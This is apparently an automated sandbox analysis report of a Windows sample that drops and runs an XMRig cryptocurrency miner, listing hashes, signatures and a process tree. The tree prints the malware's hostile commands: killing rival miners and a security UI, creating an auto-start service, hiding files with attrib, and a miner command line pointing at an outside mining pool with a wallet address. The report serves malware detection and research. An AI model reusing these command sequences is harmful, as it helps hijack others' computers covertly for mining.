Analysis
- max time kernel: 148s
- max time network: 121s
- platform: windows7_x64
- resource: win7-20240220-en
- resource tags: arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
- submitted: 20-05-2024 10:26

Tasks
- Static task: static1
- Behavioral task: behavioral1
  - Sample: 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
  - Resource: win7-20240220-en
General
- Target: 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
- Size: 1.3MB
- MD5: 5e960ba61a82c5340650e2ce975bb4c9
- SHA1: 300aced1503b54d91e5508f0a210330e91b71b8a
- SHA256: 1faff4cf4bfe0d40af1555dc2ca749c5a382197b51b327ad89c4734d6ba75ee3
- SHA512: 9143b2172a13f1d36380bd7dc9875d21c994b9aaed71b3d3a094de23ff58b3ec64adb166b727b1a41574447cd67e30ec8992278fa78d0f3f42928e576e5d1fa1
- SSDEEP: 24576:jJlh9bDrRloua2E61y6ssIpCLpNwDfzhC8avIZej5O:jJp/FLrWpe8xChgZej5O
Malware Config
Signatures
- XMRig Miner payload (14 IoCs)
  resource / yara_rule:
  - behavioral1/files/0x000700000001418c-32.dat: xmrig
  - behavioral1/memory/444-35-0x0000000000400000-0x00000000004B5000-memory.dmp: xmrig
  - behavioral1/memory/444-36-0x0000000000400000-0x00000000004B5000-memory.dmp: xmrig
  - behavioral1/memory/444-38-0x0000000000400000-0x00000000004B5000-memory.dmp: xmrig
  - behavioral1/memory/444-39-0x0000000000400000-0x00000000004B5000-memory.dmp: xmrig
  - behavioral1/memory/444-40-0x0000000000400000-0x00000000004B5000-memory.dmp: xmrig
  - behavioral1/memory/444-41-0x0000000000400000-0x00000000004B5000-memory.dmp: xmrig
  - behavioral1/memory/444-42-0x0000000000400000-0x00000000004B5000-memory.dmp: xmrig
  - behavioral1/memory/444-43-0x0000000000400000-0x00000000004B5000-memory.dmp: xmrig
  - behavioral1/memory/444-44-0x0000000000400000-0x00000000004B5000-memory.dmp: xmrig
  - behavioral1/memory/444-45-0x0000000000400000-0x00000000004B5000-memory.dmp: xmrig
  - behavioral1/memory/444-46-0x0000000000400000-0x00000000004B5000-memory.dmp: xmrig
  - behavioral1/memory/444-47-0x0000000000400000-0x00000000004B5000-memory.dmp: xmrig
  - behavioral1/memory/444-48-0x0000000000400000-0x00000000004B5000-memory.dmp: xmrig
- Creates new service(s) (2 TTPs)
- Sets file to hidden (1 TTP, 4 IoCs)
  Modifies file attributes to stop it showing in Explorer etc.
  pid / Process:
  - 584 attrib.exe
  - 564 attrib.exe
  - 2804 attrib.exe
  - 1404 attrib.exe
- Deletes itself (1 IoC)
  pid / Process:
  - 2484 cmd.exe
- Executes dropped EXE (2 IoCs)
  pid / Process:
  - 2164 mscorsvw.exe
  - 444 svchost.exe
- Loads dropped DLL (1 IoC)
  pid / Process:
  - 2164 mscorsvw.exe
- resource / yara_rule (rule: vmprotect):
  - behavioral1/files/0x002a000000013a88-22.dat: vmprotect
  - behavioral1/memory/2164-24-0x0000000000400000-0x000000000055E000-memory.dmp: vmprotect
  - behavioral1/memory/2164-25-0x0000000000400000-0x000000000055E000-memory.dmp: vmprotect
  - behavioral1/memory/2164-37-0x0000000000400000-0x000000000055E000-memory.dmp: vmprotect
- Drops file in Windows directory (16 IoCs)
  description / ioc / Process:
  - File opened for modification: C:\WINDOWS\Debug\wkde\mscorsvw.exe (attrib.exe)
  - File opened for modification: C:\WINDOWS\Debug\wkde\mscorsvw.log (attrib.exe)
  - File created: C:\Windows\debug\wkde\mscorsvw.ini (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  - File created: C:\Windows\debug\wkde\svchost.exe (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  - File opened for modification: C:\Windows\debug\wkde\svchost.exe (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  - File created: C:\Windows\debug\wkde\wk.bat (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  - File opened for modification: C:\Windows\debug\wkde\wk.bat (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  - File opened for modification: C:\WINDOWS\Debug\wkde\mscorsvw.ini (attrib.exe)
  - File created: C:\Windows\debug\__tmp_rar_sfx_access_check_259395217 (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  - File created: C:\Windows\debug\wkde\mscorsvw.exe (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  - File created: C:\WINDOWS\Debug\wkde\mscorsvw.exe (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  - File opened for modification: C:\Windows\debug\wkde\mscorsvw.ini (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  - File opened for modification: C:\WINDOWS\Debug\wkde\mscorsvw.log (mscorsvw.exe)
  - File opened for modification: C:\Windows\debug\wkde (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  - File opened for modification: C:\Windows\debug\wkde\mscorsvw.exe (5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe)
  - File opened for modification: C:\WINDOWS\Debug\wkde\svchost.exe (attrib.exe)
- Launches sc.exe (8 IoCs)
  Sc.exe is a Windows utility to control services on the system.
  pid / Process:
  - 2416 sc.exe
  - 2700 sc.exe
  - 2192 sc.exe
  - 2620 sc.exe
  - 2532 sc.exe
  - 2508 sc.exe
  - 2388 sc.exe
  - 2784 sc.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Kills process with taskkill (15 IoCs)
  pid / Process:
  - 2688 taskkill.exe
  - 2040 taskkill.exe
  - 856 taskkill.exe
  - 848 taskkill.exe
  - 2864 taskkill.exe
  - 356 taskkill.exe
  - 1128 taskkill.exe
  - 1792 taskkill.exe
  - 1020 taskkill.exe
  - 2624 taskkill.exe
  - 2444 taskkill.exe
  - 2440 taskkill.exe
  - 1520 taskkill.exe
  - 1452 taskkill.exe
  - 1964 taskkill.exe
- Runs net.exe
- Runs ping.exe (1 TTP, 2 IoCs)
  pid / Process:
  - 804 PING.EXE
  - 2760 PING.EXE
- Suspicious use of AdjustPrivilegeToken (16 IoCs)
  description / pid / Process:
  - Token: SeDebugPrivilege, 2688 taskkill.exe
  - Token: SeDebugPrivilege, 2624 taskkill.exe
  - Token: SeDebugPrivilege, 2444 taskkill.exe
  - Token: SeDebugPrivilege, 2864 taskkill.exe
  - Token: SeDebugPrivilege, 2040 taskkill.exe
  - Token: SeDebugPrivilege, 856 taskkill.exe
  - Token: SeDebugPrivilege, 2440 taskkill.exe
  - Token: SeDebugPrivilege, 356 taskkill.exe
  - Token: SeDebugPrivilege, 1792 taskkill.exe
  - Token: SeDebugPrivilege, 1520 taskkill.exe
  - Token: SeDebugPrivilege, 1452 taskkill.exe
  - Token: SeDebugPrivilege, 1020 taskkill.exe
  - Token: SeDebugPrivilege, 848 taskkill.exe
  - Token: SeDebugPrivilege, 1128 taskkill.exe
  - Token: SeDebugPrivilege, 1964 taskkill.exe
  - Token: SeLockMemoryPrivilege, 444 svchost.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
- Views/modifies file attributes (1 TTP, 4 IoCs)
  pid / Process:
  - 564 attrib.exe
  - 2804 attrib.exe
  - 1404 attrib.exe
  - 584 attrib.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"
  PID: 2184
  signatures: Drops file in Windows directory; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /c ""C:\WINDOWS\Debug\wkde\wk.bat" "
    PID: 2484
    signatures: Deletes itself; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc delete Systemss
      PID: 2620
      signatures: Launches sc.exe
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc delete WMIserver
      PID: 2532
      signatures: Launches sc.exe
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc delete WMIservers
      PID: 2508
      signatures: Launches sc.exe
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc delete WMI
      PID: 2388
      signatures: Launches sc.exe
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc delete Serv
      PID: 2784
      signatures: Launches sc.exe
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc delete system_update
      PID: 2700
      signatures: Launches sc.exe
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc delete system_updatea
      PID: 2416
      signatures: Launches sc.exe
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im spoolsvs.exe
      PID: 2688
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im taskhost.exe
      PID: 2624
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im NsCpuapl.exe
      PID: 2444
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im MSASCui.exe
      PID: 2864
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im nheqminer_zcash.exe
      PID: 2040
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im nssm.exe
      PID: 856
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im update.exe
      PID: 2440
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im server.exe
      PID: 356
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im sppscv.exe
      PID: 1792
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im taskhost.exe
      PID: 1520
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\net.exe
      cmdline: net stop wkde
      PID: 1676
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop wkde
        PID: 352
    - C:\Windows\SysWOW64\PING.EXE
      cmdline: ping -n 5 127.0.0.1
      PID: 804
      signatures: Runs ping.exe
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /im mscorsvw.exe /f
      PID: 1452
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /im WUDFHost.exe /f
      PID: 1020
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /im nheqminer.exe /f
      PID: 848
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /im NsCpuCNMiner32.exe /f
      PID: 1128
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /im NsCpuCNMiner64.exe /f
      PID: 1964
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\PING.EXE
      cmdline: ping -n 5 127.0.0.1
      PID: 2760
      signatures: Runs ping.exe
    - C:\Windows\SysWOW64\sc.exe
      cmdline: sc create wkde binPath= C:\WINDOWS\Debug\wkde\mscorsvw.exe start= auto
      PID: 2192
      signatures: Launches sc.exe
    - C:\Windows\SysWOW64\net.exe
      cmdline: net start wkde
      PID: 2180
      - C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 start wkde
        PID: 1596
    - C:\Windows\SysWOW64\attrib.exe
      cmdline: attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.exe
      PID: 584
      signatures: Sets file to hidden; Drops file in Windows directory; Views/modifies file attributes
    - C:\Windows\SysWOW64\attrib.exe
      cmdline: attrib +s +h C:\WINDOWS\Debug\wkde\svchost.exe
      PID: 564
      signatures: Sets file to hidden; Drops file in Windows directory; Views/modifies file attributes
    - C:\Windows\SysWOW64\attrib.exe
      cmdline: attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.ini
      PID: 2804
      signatures: Sets file to hidden; Drops file in Windows directory; Views/modifies file attributes
    - C:\Windows\SysWOW64\attrib.exe
      cmdline: attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.log
      PID: 1404
      signatures: Sets file to hidden; Drops file in Windows directory; Views/modifies file attributes
- C:\WINDOWS\Debug\wkde\mscorsvw.exe
  cmdline: C:\WINDOWS\Debug\wkde\mscorsvw.exe
  PID: 2164
  signatures: Executes dropped EXE; Loads dropped DLL; Drops file in Windows directory
  - C:\WINDOWS\Debug\wkde\svchost.exe
    cmdline: C:\WINDOWS\Debug\wkde\svchost.exe -o pool.minexmr.com:5555 -u 42NQYEALh7aC85Q376QpbJauGPfLLHUr3ZQCctLDEWQE3gWQUqfuDGg3vavPEB5edtGbtCHFTs6UJfZtHd2fVGAzHLwXmuN -p x -k --donate-level=1
    PID: 444
    signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 397B
  MD5: d298cd48c88433017ef4e66af740830e
  SHA1: e0ef455dc4df16948d85c5a058d0980ce5020822
  SHA256: b22ef4711432e08a93b9ef241616e51f17744a762e47b1d871aeabb6d4ae5d89
  SHA512: 5927b46c620a5b91b072ac48d7c5f2a98eff1984c8b82ae636512ebcfbb1a9d3b122f4cae81c802da4a81b0c5ee3143a931eaf42844226b7ea6aeaeceb12b8fe
- Filesize: 244B
  MD5: df296d0aa6eb740c57059aa9f47fd46c
  SHA1: de668e0436d036c2608b3a16fbfaaf3cbfd52a59
  SHA256: 3d8e422765d4e10add74a69d85ea827b90dbc2c25d021185f1bf1fbe3363823a
  SHA512: db6ef5caf3a7c682a64fe18583e2f91dc9b5fe71a274eaf5e0112246cc04b6a44abe5af7cececf73a3411f4364357acc92400b70c6d3fdd0854b4732126a8fc5
- Filesize: 687KB
  MD5: 79a1ec8d32e8e3032b5f5126c11f2216
  SHA1: 86dc55fcdc358a5c6699c41582b66b75bedc4086
  SHA256: d3bc4df4062d1a93dfe8e5beae484f011285b6c5b1f92bfa765deb59981ae2c8
  SHA512: a80fa204f05a5be209a945af9c5f8e6773c338a3cb5bd526c29e78932ed04d2c625dcb3fe5e918b07b316ba6981bb517714ad524a37f73f6055600ae1c145106
- Filesize: 684KB
  MD5: cbb4ca806e69a4880dd02e04e5bce18b
  SHA1: 1e838ddad7b04a1f2be935f6fe8e7cff3466c4d7
  SHA256: 2cadd79540acdfcc6d99875a79ed7c35fd3508e5ba6c29c9caae598fcc40b79b
  SHA512: 6240fcdf8899c8d62357ad4cfe4c749517fa91c81d8765f2e1b3e23fdf95cdde09f8954da5b5f0ef1e0fa7e34d88e5dd7070134eefc40f98a6b6264f18a295a6
- Filesize: 884B
  MD5: 816d97b2dca2af96209ef913291d59be
  SHA1: a3c480a7e333a1623e7cd8194d68468397c3f6d1
  SHA256: ccf0010fcc0783096c0323c3bbe6a88a4d969c8b327626d1eb5b493e03a8e54d
  SHA512: 54bbff4724a8b2065273f118aa1eeb61542df82fc853e01155470053b8f18cd9e1c0f8618c077dab13767e187f93653842a8df852496e5bdf7e2dd7fc0120088